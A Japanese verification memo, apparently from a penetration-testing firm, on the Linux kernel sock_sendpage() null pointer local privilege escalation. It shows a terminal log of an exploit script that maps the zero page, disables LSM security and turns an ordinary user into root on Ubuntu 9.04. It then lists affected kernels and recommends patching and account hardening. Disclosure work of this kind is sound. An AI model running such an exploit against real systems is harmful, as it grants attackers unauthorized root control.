Linux Kernel の sock_sendpage() におけるNull Pointor参照外しの脆弱性検証メモ

Linux Kernelのsock_sendpage()におけるNull Pointor参照外しの脆弱性の検証を行いました。
検証を行った対象OSは。
Ubuntu 9.04(2.6.28-11-generic)
RedHat EL 5(2.6.18.8.el5)
です。

この脆弱性を利用することで一般ユーザからrootへと権限昇格を行うことが可能であるか否かの検証結果は以下の通りです。
pentest@pubuntu:~/sock_sendpage_nullpo$ uname -a
Linux pubuntu 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux

pentest@pubuntu:~/sock_sendpage_nullpo$ id
uid=1000(pentest) gid=1000(pentest) 所属グループ=4(adm),
20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),
122(sambashare),1000(pentest)

pentest@pubuntu:~/sock_sendpage_nullpo$ ./sock_sendpage_nullpo.sh
[+] Personality set to: PER_SVR4
I: caps.c: Limited capabilities successfully to CAP_SYS_NICE.
I: caps.c: Dropping root privileges.
I: caps.c: Limited capabilities successfully to CAP_SYS_NICE.
[+] MAPPED ZERO PAGE!
[+] Resolved selinux_enforcing to 0xc086b3bc
[+] Resolved selinux_enabled to 0xc086b3b8
[+] Resolved apparmor_enabled to 0xc06a5d84
[+] Resolved apparmor_complain to 0xc086cfb8
[+] Resolved apparmor_audit to 0xc086cfc0
[+] Resolved apparmor_logsyscall to 0xc086cfc4
[+] Resolved security_ops to 0xc0869b60
[+] Resolved default_security_ops to 0xc06a4b40
[+] Resolved sel_read_enforce to 0xc02933d0
[+] Resolved audit_enabled to 0xc0828564
[+] got ring0!
[+] detected 2.6 style 8k stacks
[+] Disabled security of : LSM
[+] Got root!
# id
uid=0(root) gid=0(root) 所属グループ=4(adm),
20(dialout),24(cdrom),46(plugdev),106(lpadmin),
121(admin),122(sambashare),1000(pentest)

上記に示したとおり、「pentest」ユーザから「root」ユーザへと権限昇格することに成功しました。

影響を受けるKernelは
Linux Kernel 2.4.37.5以前
Linux Kernel 2.6.30.5以前
Linux Kernel 2.6.31-rc6以前
とのことです。

システムへのログイン後にのみ利用可能な脆弱性となりますが、影響を受けるバージョンをお使いの場合は可能な限り早急に各種ベンダーからリリースされている修正パッチを適用されることが推奨されます。
運用上の理由などにより、上記対策を行うことができない場合は、今一度リモートログイン可能なユーザの中に脆弱なパスワードが設定されているユーザがシステム上に存在しないかどうかの確認を行い、存在する場合は、強固なパスワードを設定してください。また、不要なユーザが存在する場合には直ちに削除を行うといった回避策を講じてください。
ただし、正規のログインユーザによる攻撃、つまり、内部犯行を行われた場合には、上記対策は回避策とはならないためアップグレードという根本的対策を講じるスケジュールを明確にすることが推奨されます。